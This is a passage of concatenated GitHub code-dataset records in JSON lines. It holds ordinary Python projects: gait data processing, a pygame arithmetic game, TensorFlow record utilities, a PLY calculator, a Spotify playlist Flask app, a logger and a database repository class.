classifier.predict(std_data)\nprint(prediction)\n\nif prediction[0] == 0:\n print('The person is not diabetic')\nelse:\n print('The person is diabetic')\n","repo_name":"Arnab1899/Diabetics-Prediction-using-Machine-Learning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41624447163","text":"import h5py\nimport pandas as pd\nimport numpy as np\nfrom src.utility.get_APDM_files import get_APDM_ContAlgo_files_AWS\n\nimport sys\nsys.path.insert(1, '/Users/bluesky/Documents/GitHub/STEPP/src/') #path where the file is downloaded\nfrom helpers import *\n\ndef get_ContAlgo_strides(data):\n steps = []\n steps = data['Bouts']['gaitIndices'].value\n l, w = steps.shape\n max_strides = steps[l-1][w-1]\n total_strides = (max_strides + 1)*2\n\n return total_strides\n\n\ndef process_APDM_Cont_Algo(data):\n #Bouts: - Use these bout times (from James McNames)\n #data['Bouts'].keys()\n\n #Metrics - Gait\n gait_data = data['Metrics']['Gait']['Feet']\n results = []\n metrics = []\n for key in gait_data.keys():\n validity = pd.DataFrame(gait_data[key]['validity'].value)\n values = pd.DataFrame(gait_data[key]['values'].value)\n\n validity.columns = ['valL', 'valR']\n values.columns = ['valuesL', 'valuesR']\n #joint_df = pd.concat([validity, values], axis = 1)\n #results.append({'metric': key,\n # 'median_value': np.nanmedian(values)})\n\n metrics.append(key)\n results.append(np.nanmedian(values))\n turns_data = data['Metrics']['Turns']['Lumbar']\n for key in turns_data.keys():\n try:\n validity = pd.DataFrame(turns_data[key]['validity'].value)\n values = pd.DataFrame(turns_data[key]['values'].value)\n\n #results.append({'metric': 'Turns-' + key,\n # 'median_value': np.nanmedian(values)})\n metrics.append(key)\n results.append(np.nanmedian(values))\n except ValueError:\n datetimes = data['Metrics']['Turns']['Lumbar'][key].value\n\n obj = pd.DataFrame([results])\n obj.columns = metrics\n\n obj['total_strides'] = get_ContAlgo_strides(data)\n\n return obj\n\nif __name__ == '__main__':\n get_APDM_ContAlgo_files_AWS()\n #file = '/Users/bluesky/Downloads/X9001262_A_10010001_01_OPAL_20minWalk_Continuous_Analysis.h5'\n #data = h5py.File(file, 'r')\n APDM_files = get_APDM_ContAlgo_files_AWS()\n results = []\n for index, row in APDM_files.iterrows():\n data = read_file_aws(row.S3_obj.bucket_name, row.S3_obj.key, '.h5')\n try:\n results_df = process_APDM_Cont_Algo(data)\n except KeyError:\n continue\n new_obj = {'subject': row.subject,\n 'visit': row.visit,\n 'task': row.task}\n res_obj = pd.concat([pd.DataFrame([new_obj]), results_df], axis=1)\n results.append(res_obj)\n\n res_df = pd.concat(results)\n res_df.to_csv('/Users/bluesky/Documents/X9001262/Data_Science/X9001262_APDM_ContAlgo_Medians.csv', index = False)\n","repo_name":"stjordanis/dmtiDevices","sub_path":"apdm/apdmContinuousAlgo.py","file_name":"apdmContinuousAlgo.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1738515031","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('artbot_website', '0012_event_add_title_raw'),\n ]\n\n operations = [\n migrations.AlterUniqueTogether(\n name='event',\n unique_together=set([('venue', 'title_raw')]),\n ),\n migrations.RemoveField(\n model_name='event',\n name='titleRaw',\n ),\n ]\n","repo_name":"coreymcdermott/artbot","sub_path":"artbot_website/migrations/0013_event_remove_event_titleRaw.py","file_name":"0013_event_remove_event_titleRaw.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"20969072169","text":"#!/usr/bin/env python\n\n\"\"\"\nA basket ball game\n\"\"\"\n\n\nVERSION = '0.1'\n\ntry:\n import sys, random, math, os, getopt\n import pygame\n from socket import *\n from pygame.locals import *\n import sqlalchemy as sa\n from sqlalchemy.orm import sessionmaker\n\n from oldlib.scene import Scene\n from oldlib.game import GameBase\n from oldlib.utils import *\n from lib.operation import OperationType\n from lib.arithmetic import ArithmeticFactory\n from lib.question import QuestionStatus, Question, ArithQuestion\n from lib.exam import Exam\n from lib.sound import Sound\n from lib.image import Image\n from lib.voicer import Voicer\n\n # from model import Base\n # from model.user_model import UserModel\n # from model.setting_model import SettingModel\n # from model.question_model import QuestionModel\n from lib.basketball import BasketBall\n\nexcept ImportError as e:\n print(f'Failed to load module: {e}')\n sys.exit(2)\n\n\n\nclass TitleScene(Scene):\n def __init__(self, id='title_scene', name='Title Sene', bg_color=(0,0,0), bg_image=None, bg_music=None):\n # self.tts_engine = None\n self.voicer = None\n super().__init__(id=id, name=name, bg_color=bg_color, bg_image=bg_image, bg_music=bg_music)\n\n \n def _pre_enter(self, **kwarg):\n super()._pre_enter(**kwarg)\n self.voicer.sayTTS(\"Hello, Ada. How are you!\")\n \n\n def draw(self, screen):\n # screen.fill(DEFAULT_BACKGROUND)\n WIDTH, HEIGHT = screen.get_size()\n draw_text(screen, \"GET READY\", 50, WHITE, WIDTH / 2, HEIGHT / 2, align=\"center\")\n draw_text(screen, \"press to start\", 20, WHITE, WIDTH / 2, HEIGHT * 3 / 4, align=\"center\")\n draw_text(screen, \"press for menu\", 20, WHITE, WIDTH / 2, HEIGHT * 3 / 4 + 50, align=\"center\")\n\n\nclass ArithExam(Exam):\n def __init__(self):\n self.operation = OperationType()\n self.arithmeticFactory = ArithmeticFactory()\n \n super().__init__()\n\n def add(self, question):\n if question.status != QuestionStatus.COMPLETED:\n self.incompleted_questions[question.id] = question\n self.completed_questions.pop(question.id, None)\n else:\n self.completed_questions[question.id] = question\n self.incompleted_questions.pop(question.id, None)\n\n def load(self):\n self.number += 1\n for i in range(0, 9):\n arithmetic = self.arithmeticFactory.buildAritmetic(self.operation)\n question = ArithQuestion(f'arith_{i}', i, arithmetic)\n self.add(question)\n \n \n\n def next(self):\n if self.question != None:\n self.add(self.question)\n self.question = None\n\n if self.is_completed == False:\n self.question = self.incompleted_questions[sorted(self.incompleted_questions.keys())[0]]\n return self.question\n \n @property\n def is_completed(self):\n return len(self.incompleted_questions.keys()) == 0 and self.question == None \n\n \n def draw(self, screen):\n # screen.fill(DEFAULT_BACKGROUND)\n WIDTH, HEIGHT = screen.get_size()\n left_tab_x = WIDTH/10\n left_tab_y = HEIGHT*2/5\n\n \n exam_number = f'Exam : {self.number}'\n draw_text(screen, exam_number, 30, GREEN, left_tab_x, left_tab_y, align='center')\n left_tab_y += 35\n\n exam_total = f'Total : {self.total_count}'\n draw_text(screen, exam_total, 30, GREEN, left_tab_x, left_tab_y, align='center')\n left_tab_y += 35\n\n exam_complete = f'Complete : {self.complete_count}'\n draw_text(screen, exam_complete, 30, GREEN, left_tab_x, left_tab_y, align='center')\n left_tab_y += 35\n\n exam_remains = f'Remain : {self.incomplete_count}'\n draw_text(screen, exam_remains, 30, GREEN, left_tab_x, left_tab_y, align='center')\n left_tab_y += 35\n\n exam_correct = f'Correct : {self.result_count(True)}'\n draw_text(screen, exam_correct, 30, GREEN, left_tab_x, left_tab_y, align='center')\n left_tab_y += 35\n\n exam_wrong = f'Wrong : {self.result_count(False)}'\n draw_text(screen, exam_wrong, 30, RED, left_tab_x, left_tab_y, align='center')\n left_tab_y += 35\n\n question_status = f'{self.question.status}'\n draw_text(screen, question_status, 20, GREEN, left_tab_x, left_tab_y, align='center') \n\n question_tab_x = WIDTH//2\n question_tab_y = HEIGHT/6\n\n draw_text(screen, f'Please Input the Result', 50, WHITE, question_tab_x , question_tab_y, align='center')\n question_tab_y += 60\n \n question_number = f'Question : {self.question.number}'\n draw_text(screen, question_number, 30, WHITE, question_tab_x , question_tab_y, align='center')\n question_tab_y += 100\n\n draw_text(screen, f'{self.question}', 150, WHITE, question_tab_x, question_tab_y, align=\"center\")\n question_tab_y += 180\n\n question_color = WHITE if self.question.result == None else RED if self.question.result == False else GREEN \n draw_text(screen, f'{self.question.answer}', 200, question_color, question_tab_x, question_tab_y, align=\"center\")\n question_tab_y += 210\n\n draw_text(screen, \"press to end\", 20, WHITE, question_tab_x, HEIGHT * 3 / 4, align=\"center\")\n \n \n\nclass ArithScene(Scene):\n def __init__(self, id='arith_scene', name='Arith Sene', bg_color=(0,0,0), bg_image=None, bg_music=None):\n self.exam = ArithExam()\n self.exam.load()\n self.question = self.exam.next()\n # self.tts_engine = None\n self.voicer = None\n self.right_image = None\n self.wrong_image = None\n \n super().__init__(id=id, name=name, bg_color=bg_color, bg_image=bg_image, bg_music=bg_music)\n\n def draw(self, screen):\n self.exam.draw(screen)\n\n self.basketball.draw(screen)\n\n if self.question.status == QuestionStatus.GRADED and self.question.result != None:\n if self.question.result == True:\n img_rect = self.right_image.get_rect()\n img_rect.center = (800, 450)\n screen.blit(self.right_image, img_rect)\n else:\n img_rect = self.wrong_image.get_rect()\n img_rect.center = (800, 450)\n screen.blit(self.wrong_image, img_rect)\n \n\n def _handle_scene_event(self, event):\n if self.question != None:\n if self.question.status == QuestionStatus.STARTED:\n if event.type == KEYUP and event.key in [K_0, K_1, K_2, K_3, K_4, K_5, K_6, K_7, K_8, K_9]:\n key = event.key - 48\n self.question.answering(key)\n elif self.question.status == QuestionStatus.ANSWERED:\n if event.type == KEYUP:\n if event.key == K_RETURN:\n self.question.submit()\n if self.question.result == True:\n self.voicer.sayTTS(\"Well done!\")\n else:\n self.voicer.sayTTS(\"Sorry!\")\n elif event.key in [K_0, K_1, K_2, K_3, K_4, K_5, K_6, K_7, K_8, K_9]:\n key = event.key - 48\n value = self.question.answer*10 + key\n self.question.answering(value)\n elif event.key == K_ESCAPE:\n self.question.answering(0)\n\n elif self.question.status == QuestionStatus.GRADED:\n if event.type == KEYUP and event.key in [K_RIGHT, K_SPACE, K_RETURN]:\n self.question.complete()\n self.exam.add(self.question)\n self.question = None\n elif self.question.status == QuestionStatus.COMPLETED:\n if event.type == KEYUP and event.key in [K_RIGHT, K_SPACE, K_RETURN]:\n key = event.key - 48\n self.question = self.exam.next()\n\n return super()._handle_scene_event(event)\n\n\n def update(self):\n if (self.question == None) or self.question.status == QuestionStatus.COMPLETED:\n if self.exam.is_completed == False:\n self.question = self.exam.next()\n if self.question == None:\n if self.exam.operation.type == OperationType.ADD:\n self.exam.operation = OperationType(OperationType.SUB)\n else:\n self.exam.operation = OperationType(OperationType.ADD)\n self.exam.load()\n self.question = self.exam.next()\n\n if self.question.status == QuestionStatus.INITED:\n self.question.start()\n self.voicer.saySimple(f'{self.question}')\n \n self.basketball.update()\n return super().update()\n\n\nclass MenuScene(Scene):\n def __init__(self, id='menu_scene', name='Menu Sene', bg_color=(0,0,0), bg_image=None, bg_music=None):\n self.voider = None\n super().__init__(id=id, name=name, bg_color=bg_color, bg_image=bg_image, bg_music=bg_music)\n\n\n def draw(self, screen):\n # screen.fill(DEFAULT_BACKGROUND)\n WIDTH, HEIGHT = screen.get_size()\n draw_text(screen, \"SETTINGS\", 50, WHITE, WIDTH / 2, HEIGHT / 2, align=\"center\")\n draw_text(screen, \"press to return\", 20, WHITE, WIDTH / 2, HEIGHT * 3 / 4, align=\"center\")\n\n\nclass EndScene(Scene):\n def __init__(self, id='end_scene', name='End Sene', bg_color=(0,0,0), bg_image=None, bg_music=None):\n self.voicer = None\n super().__init__(id=id, name=name, bg_color=bg_color, bg_image=bg_image, bg_music=bg_music)\n\n\n def _handle_scene_event(self, event):\n super()._handle_scene_event(event)\n if event.type == KEYDOWN and event.key == K_q:\n self.voicer.sayTTS(\"Goodbye Ada, my honor to see next time\")\n self.end()\n self.voicer.end()\n sys.exit(0)\n\n\n def draw(self, screen):\n # screen.fill(DEFAULT_BACKGROUND)\n WIDTH, HEIGHT = screen.get_size()\n draw_text(screen, \"GAME OVER\", 50, WHITE, WIDTH / 2, HEIGHT / 2, align=\"center\")\n draw_text(screen, \"press to restart\", 20, WHITE, WIDTH / 2, HEIGHT * 3 / 4, align=\"center\")\n draw_text(screen, \"press to exit\", 20, WHITE, WIDTH / 2, HEIGHT * 3 / 4 + 30, align=\"center\")\n\n\nclass ArithGame(GameBase):\n\n def _init_db(self):\n db_engine = sa.create_engine(f'sqlite:///{os.path.join(self.main_dir, \"data/adarith.db?check_same_hread=False\")}', echo=True)\n Base.metadata.create_all(db_engine)\n db_session = sessionmaker(bind=db_engine)\n self.db_session = db_session()\n UserModel.init_user(self.db_session)\n SettingModel.init_setting(self.db_session)\n QuestionModel.init_question(self.db_session)\n\n \n def _init_res(self):\n super()._init_res()\n self.key_sound = Sound(os.path.join(self.sound_dir, 'pew.wav'))\n self.bg_image = Image(os.path.join(self.image_dir, 'blackboard_1024_768.png')).image\n self.right_image = Image(os.path.join(self.image_dir, 'right_140_147.png')).image\n self.wrong_image = Image(os.path.join(self.image_dir, 'wrong_140_177.png')).image\n ball_path = os.path.join(self.image_dir, 'basketball_50_50.png') \n speed = 13\n rand = ((0.1 * (random.randint(5, 8))))\n vector = (0.47, speed)\n basketball = BasketBall(path=ball_path, vector=vector)\n self.basketball = pygame.sprite.RenderPlain(basketball)\n # self._init_db()\n\n self.voicer_name = 'ada'\n self.voice_path = os.path.join(self.sound_dir, self.voicer_name)\n self.voicer = Voicer(path = self.voice_path)\n\n \n\n def _init_scenes(self):\n happyTune = os.path.join(self.sound_dir, 'Happy Tune.ogg')\n titleScene = TitleScene(bg_music=happyTune)\n # titleScene.tts_engine = self.engine\n titleScene.voicer = self.voicer\n\n arithScene = ArithScene(bg_music=happyTune)\n # arithScene.tts_engine = self.engine\n arithScene.voicer = self.voicer\n arithScene.right_image = self.right_image\n arithScene.wrong_image = self.wrong_image\n arithScene.basketball = self.basketball\n\n menuScene = MenuScene(bg_music=happyTune)\n menuScene.voicer = self.voicer\n\n yippee = os.path.join(self.sound_dir, 'Yippee.ogg')\n endScene = EndScene(bg_music=yippee)\n endScene.voicer = self.voicer\n\n titleScene.add_next(K_ESCAPE, endScene).add_next(K_m, menuScene).add_next(K_SPACE, arithScene)\n menuScene.add_next(K_ESCAPE, titleScene)\n arithScene.add_next(K_q, endScene)\n endScene.add_next(K_r, titleScene)\n\n self.scene = titleScene\n \n return super()._init_scenes()\n\n\n def _pre_run(self, **kwargs):\n super()._pre_run(**kwargs)\n self.scene.switch_to(self.scene)\n\n\n\n ","repo_name":"webji/adarith","sub_path":"adarith/arithgame.py","file_name":"arithgame.py","file_ext":"py","file_size_in_byte":12943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41728434318","text":"import numpy as np\nimport tensorflow as tf\nimport os\n\nfrom scipy import misc\nfrom PIL import Image\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\ndef create_tfrecord(tfrecords_filename, jpg_files):\n print(\"Creating TF Record\")\n writer = tf.python_io.TFRecordWriter(tfrecords_filename)\n\n for img_file in jpg_files:\n img = np.array(Image.open(img_file))\n\n height = img.shape[0]\n width = img.shape[1]\n img_raw = img.tostring()\n\n example = tf.train.Example(features=tf.train.Features(feature={\n 'height': _int64_feature(height),\n 'width': _int64_feature(width),\n 'image_raw': _bytes_feature(img_raw)}))\n\n writer.write(example.SerializeToString())\n\n writer.close()\n\ndef read_and_decode(filename_queue, FLAGS):\n reader = tf.TFRecordReader()\n\n _, serialized_example = reader.read(filename_queue)\n\n features = tf.parse_single_example(\n serialized_example,\n features={\n 'height': tf.FixedLenFeature([], tf.int64),\n 'width': tf.FixedLenFeature([], tf.int64),\n 'image_raw': tf.FixedLenFeature([], tf.string),\n })\n\n image = tf.decode_raw(features['image_raw'], tf.uint8)\n height = tf.cast(features['height'], tf.int32)\n width = tf.cast(features['width'], tf.int32)\n\n image_shape = tf.stack([height, width, 3])\n image = tf.reshape(image, image_shape)\n resized_image = tf.image.resize_image_with_crop_or_pad(image=image,\n target_height=FLAGS.img_size,\n target_width=FLAGS.img_size)\n\n images = tf.train.shuffle_batch([resized_image],\n batch_size=FLAGS.fixed_batch_size,\n capacity=FLAGS.capacity,\n num_threads=FLAGS.num_threads,\n min_after_dequeue=FLAGS.min_after_dequeue)\n # Normalize\n images = tf.cast(images, tf.float32)\n images = tf.subtract(tf.truediv(images, 127.5), 1)\n return images\n\ndef immerge_save(images, epoch, img_size, path_dir):\n images = np.array(images).squeeze()\n h, w, c = images.shape[1], images.shape[2], images.shape[3]\n\n filename = os.path.join(path_dir, '{:d}.jpg'.format(epoch))\n img = np.zeros((h * img_size, w * img_size, c))\n\n for idx, image in enumerate(images):\n i = idx % img_size\n j = idx // img_size\n img[j * h:j * h + h, i * w:i * w + w, ...] = image\n\n img = (img + 1.) / 2\n\n return misc.imsave(filename, img)\n","repo_name":"zxcvbnmditto/GAN","sub_path":"vanilla_gan/new_utils.py","file_name":"new_utils.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10437477384","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ncalc.py\n\nThis file uses the lex and yacc scripts implemented in the PLY library (Python \nLex-Yacc). All the functions defined in the file are rules for tokenizing and\nparsing. The docstrings of the functions are also parsed as the grammar rules.\n\"\"\"\n\nfrom ply import lex, yacc\n\n# tokens supported by the script\ntokens = (\n \"NUMBER\",\n \"PLUS\",\n \"MINUS\",\n \"TIMES\",\n \"DIVIDE\",\n \"LPAREN\",\n \"RPAREN\",\n)\n\n# rule for parsing a NUMBER token\ndef t_NUMBER(t):\n r\"\\d+\"\n t.value = int(t.value)\n return t\n\n\n# rules for parsing the operator tokens and the parenthesis\nt_PLUS = r\"\\+\"\nt_MINUS = r\"-\"\nt_TIMES = r\"\\*\"\nt_DIVIDE = r\"/\"\nt_LPAREN = r\"\\(\"\nt_RPAREN = r\"\\)\"\n\n# ignored characters\nt_ignore = \" \"\n\n# precedence rules for the arithmetic operators\nprecedence = (\n (\"left\", \"PLUS\", \"MINUS\"),\n (\"left\", \"TIMES\", \"DIVIDE\"),\n (\"right\", \"UMINUS\"),\n)\n\n# exit on token errors\ndef t_error(t):\n exit(t)\n\n\n# grammar for EXPR\ndef p_statement_expr(p):\n \"statement : expression\"\n print(p[1])\n\n\n# grammar for binary arithmetic operators\ndef p_expression_binop(p):\n \"\"\"expression : expression PLUS expression\n | expression MINUS expression\n | expression TIMES expression\n | expression DIVIDE expression\"\"\"\n if p[2] == \"+\":\n p[0] = p[1] + p[3]\n elif p[2] == \"-\":\n p[0] = p[1] - p[3]\n elif p[2] == \"*\":\n p[0] = p[1] * p[3]\n elif p[2] == \"/\":\n p[0] = p[1] / p[3]\n\n\n# grammar for UNARY MINUS\ndef p_expression_uminus(p):\n \"expression : MINUS expression %prec UMINUS\"\n p[0] = -p[2]\n\n\n# grammar for EXPR between LPAREN and RPAREN\ndef p_expression_group(p):\n \"expression : LPAREN expression RPAREN\"\n p[0] = p[2]\n\n\n# grammar for NUMBER\ndef p_expression_number(p):\n \"expression : NUMBER\"\n p[0] = p[1]\n\n\n# exit on grammar errors\ndef p_error(p):\n exit(p)\n\n\n# build the lexer\nlex.lex()\nyacc.yacc()\n\n# parse an example input string\nyacc.parse(\"-1 + (2 * 3 + 4) * -5\")\n","repo_name":"ribbas/grad_courses","sub_path":"629_programming_languages/assn/02/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22332095346","text":"import spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nfrom flask import Flask, request, url_for, session, redirect, render_template\nimport json\nimport time, datetime\nimport os\nimport random\nfrom spotifysecrets import likedID, likedSecret\n\napp = Flask(__name__)\n\napp.secret_key = \"OsdfdEdfdI234D\"\napp.config['SESSION_COOKIE_NAME'] = 'Cookie'\n\n\n# TOKENINFO = \"token_info\"\n\n@app.route('/')\ndef login():\n sp_oauth = create_spotify_oauth()\n auth_url = sp_oauth.get_authorize_url()\n # print(auth_url)\n return redirect(auth_url)\n\n\n@app.route('/logout', methods=['GET', 'POST'])\ndef logout():\n for key in list(session.keys()):\n session.pop(key)\n if os.path.exists(\"./.cache\"):\n os.remove(\"./.cache\")\n return redirect('/')\n\n\n@app.route('/authorize')\ndef authorize():\n sp_oauth = create_spotify_oauth()\n session.clear()\n code = request.args.get('code')\n token_info = sp_oauth.get_access_token(code)\n session[\"token_info\"] = token_info\n return redirect(\"/functions\")\n\n\n@app.route('/functions')\ndef spotifyFunctions():\n # Confirm authorization\n session['token_info'], authorized = get_token()\n session.modified = True\n if not authorized:\n return redirect('/')\n sp = spotipy.Spotify(auth=session.get('token_info').get('access_token'))\n songIDs = getLikedSongs(sp, 0)\n songList = []\n for song in songIDs:\n track = sp.track(song)\n songList.append({\"name\": track[\"name\"], \"artist\": track[\"artists\"][0][\"name\"]})\n\n # Retrieves user's public owned playlists and *publicly* followed playlists\n playlistsObject = sp.current_user_playlists()\n playlists = []\n followedPlaylists = []\n user = sp.current_user()\n for p in playlistsObject[\"items\"]:\n if p['owner']['id'] == user['id']:\n playlists.append({\"name\": p[\"name\"], \"id\": p[\"id\"]})\n # else:\n followed = sp.playlist(p['id'])\n length = 0\n for track in followed['tracks']['items']:\n length += track['track']['duration_ms'] / 1000 / 60 / 60\n followedPlaylists.append({\"name\": p[\"name\"], \"id\": p[\"id\"], \"length\": round(length, 3)})\n # Just added a way to more easily visualize the structure\n # with open('playlistTest.json', 'w') as f:\n # json.dump(playlistsObject, f)\n return render_template('index.html', songList=songList, playlists=playlists, followedPlaylists=followedPlaylists)\n\n\n@app.route('/addToPlaylist', methods=['POST'])\ndef addToPlaylist():\n # Adds user's 'liked songs' library to a playlist of choice\n sp = spotipy.Spotify(auth=session.get('token_info').get('access_token'))\n playlistID = request.form.get(\"addToPlaylist\")\n songList = getLikedSongs(sp, 0)\n sp.playlist_add_items(playlistID, songList)\n return redirect('/functions')\n\n\n@app.route('/removeFromLiked', methods=['POST'])\ndef removeFromLiked():\n # Clears user's library, but can only do 50 at a time\n sp = spotipy.Spotify(auth=session.get('token_info').get('access_token'))\n songList = getLikedSongs(sp, 50)\n print(len(songList))\n sp.current_user_saved_tracks_delete(songList)\n\n return redirect('/functions')\n\n\n@app.route('/createPartialPlaylist', methods=['POST'])\ndef createPartialPlaylist():\n sp = spotipy.Spotify(auth=session.get('token_info').get('access_token'))\n # Get string playlistID\n playlistID = request.form.get(\"createPartialPlaylist\")\n if not playlistID:\n return redirect('/functions')\n # Get list of song IDs\n playlistTracksObject = sp.playlist_items(playlistID, additional_types=(\"track\",))\n playlistTracks = []\n for track in playlistTracksObject[\"items\"]:\n playlistTracks.append(track['track']['id'])\n # Get string newName\n newName = request.form.get(\"newName\")\n if not newName:\n return redirect('/functions')\n\n # Shuffle will be \"on\" or None\n shuffle = request.form.get(\"shuffleOn\")\n if shuffle:\n shuffledTracks = []\n while len(shuffledTracks) < len(playlistTracks):\n tmp = random.choice(range(len(playlistTracks)))\n if playlistTracks[tmp] not in shuffledTracks:\n shuffledTracks.append(playlistTracks[tmp])\n if len(shuffledTracks) == len(playlistTracks):\n break\n playlistTracks = shuffledTracks\n\n # Get max length, convert to float\n maxLength = request.form.get(\"playlistLength\")\n if not isFloat(maxLength) or float(maxLength) < 0.5:\n return redirect('/functions')\n maxLength = float(maxLength)\n # Shorten playlist by adding songs until hitting max length\n shortPlaylist = []\n totalTime = 0\n for trackID in playlistTracks:\n dur = sp.track(trackID)[\"duration_ms\"] / 1000.0 / 60 / 60\n if totalTime + dur < maxLength:\n shortPlaylist.append(trackID)\n totalTime += dur\n else:\n break\n date = datetime.date.today()\n description = f\"Shortened version of {sp.playlist(playlistID)['name']}, created on {date}\"\n # Create new playlist\n newPlaylist = sp.user_playlist_create(sp.current_user()['id'], name=str(newName), description=description)\n # Add songs\n sp.playlist_add_items(newPlaylist['id'], shortPlaylist)\n return redirect('/functions')\n\n\ndef isFloat(i):\n try:\n float(i)\n except ValueError:\n return False\n return True\n\n\ndef getLikedSongs(sp, mx):\n # Returns list of ids of songs in user's library\n songList = []\n count = 0\n while True:\n offset = count * 50\n count += 1\n curGroup = sp.current_user_saved_tracks(limit=50, offset=offset)['items']\n for idx, item in enumerate(curGroup):\n # val = {item['track']['id']}\n songList.append(item['track']['id'])\n # this can be updated to use the mx value if needed\n if mx != 0:\n break\n if len(curGroup) < 50:\n break\n\n return songList\n\n\n# Checks to see if token is valid and gets a new token if not\ndef get_token():\n token_valid = False\n token_info = session.get(\"token_info\", {})\n\n # Checking if the session already has a token stored\n if not (session.get('token_info', False)):\n token_valid = False\n return token_info, token_valid\n\n # Checking if token has expired\n now = int(time.time())\n is_token_expired = session.get('token_info').get('expires_at') - now < 60\n\n # Refreshing token if it has expired\n if is_token_expired:\n sp_oauth = create_spotify_oauth()\n token_info = sp_oauth.refresh_access_token(session.get('token_info').get('refresh_token'))\n\n token_valid = True\n return token_info, token_valid\n\n\ndef create_spotify_oauth():\n return SpotifyOAuth(\n client_id=likedID,\n client_secret=likedSecret,\n redirect_uri=url_for('authorize', _external=True),\n show_dialog=True,\n scope=\"user-library-read, user-library-modify, playlist-modify-public\")\n","repo_name":"tsennema/spotify","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37712646299","text":"# max entropy rw's\n# trans prob defined in terms of components of eig centrality of node i \n# e_i is i-th component of normalized eigenvector corresponding to max eigenval of A\n\ndef max_entropy_rw(A, e, chi):\n n = len(A)\n w = np.zeros((n,n))\n for i in range(n):\n for j in range(n):\n w[i,j] = (e[j]/(chi*e[i]))*A[i,j]\n \n return w\n","repo_name":"siantist/graph_mining","sub_path":"grakel/method_random_walk/max_entropy_rw.py","file_name":"max_entropy_rw.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42630859553","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n @Time : 2018/8/21 上午11:03\n @Author : hanxiaocu\n @File : store.py\n\n 日志工具\n\"\"\"\n\nimport os\nimport logging\nimport time\n\n\nclass UtilLogger(object):\n \"\"\"\n 日志工具类\n \"\"\"\n\n def __init__(self, name, logfile_name=None, level=logging.DEBUG):\n self.level = level\n self.logfile_name = logfile_name\n self.name = name\n self.logger = logging.getLogger(name)\n self.logger.setLevel(level)\n formatter = logging.Formatter(\"%(asctime)s [%(levelname)s] %(name)s - %(message)s\")\n ch = None\n if logfile_name is None:\n ch = logging.StreamHandler()\n else:\n logDir = os.path.dirname(logfile_name)\n if logDir != \"\" and not os.path.exists(logDir):\n os.mkdir(logDir)\n pass\n now = time.localtime()\n suffix = '.%d%02d%02d' % (now.tm_year, now.tm_mon, now.tm_mday)\n ch = logging.FileHandler(logfile_name + suffix)\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(formatter)\n self.logger.addHandler(ch)\n\n def set_level(self, level):\n if level.lower() == \"debug\":\n self.logger.setLevel(logging.DEBUG)\n elif level.lower() == \"info\":\n self.logger.setLevel(logging.INFO)\n elif level.lower() == \"warning\":\n self.logger.setLevel(logging.WARNING)\n elif level.lower() == \"error\":\n self.logger.setLevel(logging.ERROR)\n\n def debug(self, message):\n self.logger.debug(message)\n\n def info(self, message):\n self.logger.info(message)\n\n def warning(self, message):\n self.logger.warning(message)\n\n def error(self, message):\n self.logger.error(message)\n","repo_name":"SmallBlackBeans/pythonPractice","sub_path":"hello/爬虫/练习/搜狗词库抓取&解析/utils/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33928440461","text":"from typing import List, Union\n\nfrom classes.interfaces import IRepository\nfrom database.mysql.entities import Cabinet, Office, Order, Product, Product_Category\nfrom database.sqlalchemy import get_session\nfrom fastapi import HTTPException, status\n\ndomain_names = Union[Office, Cabinet, Product, Product_Category, Order]\n\n\nclass MysqlRepository(IRepository):\n def __init__(self, cls: domain_names) -> None:\n self.db = get_session()\n self.cls = cls\n\n def get(\n self, limit: int = 5, offset: int = 0, **kwargs\n ) -> Union[\n List[Office],\n List[Cabinet],\n List[Order],\n List[Product],\n List[Product_Category],\n Office,\n Cabinet,\n Order,\n Product,\n Product_Category,\n ]:\n query = self.db.query(self.cls)\n\n if len(kwargs) > 0 and all(\n [getattr(self.cls, k[0], None) for k in kwargs.items()]\n ):\n try:\n for k, v in kwargs.items():\n query = query.filter(self.cls.__getattribute__(self.cls, k) == v)\n except AttributeError:\n return []\n\n return (\n [x.__dict__ for x in query.limit(limit).offset(offset).all()]\n if limit > 1\n else query.limit(limit).offset(offset).first().__dict__\n )\n\n def add(self, elem) -> domain_names:\n try:\n d = self.cls(**elem.__dict__)\n self.db.add(d)\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST)\n self.db.commit()\n\n def update(self, id: str, update_elem: domain_names) -> domain_names:\n elem = self.cls(id=id, **update_elem.__dict__)\n old = self.get(limit=1, offset=0, id=id)\n try:\n self.remove(old)\n self.add(elem)\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST)\n self.db.commit()\n return elem\n\n def remove(self, elem) -> None:\n try:\n self.db.delete(elem)\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST)\n 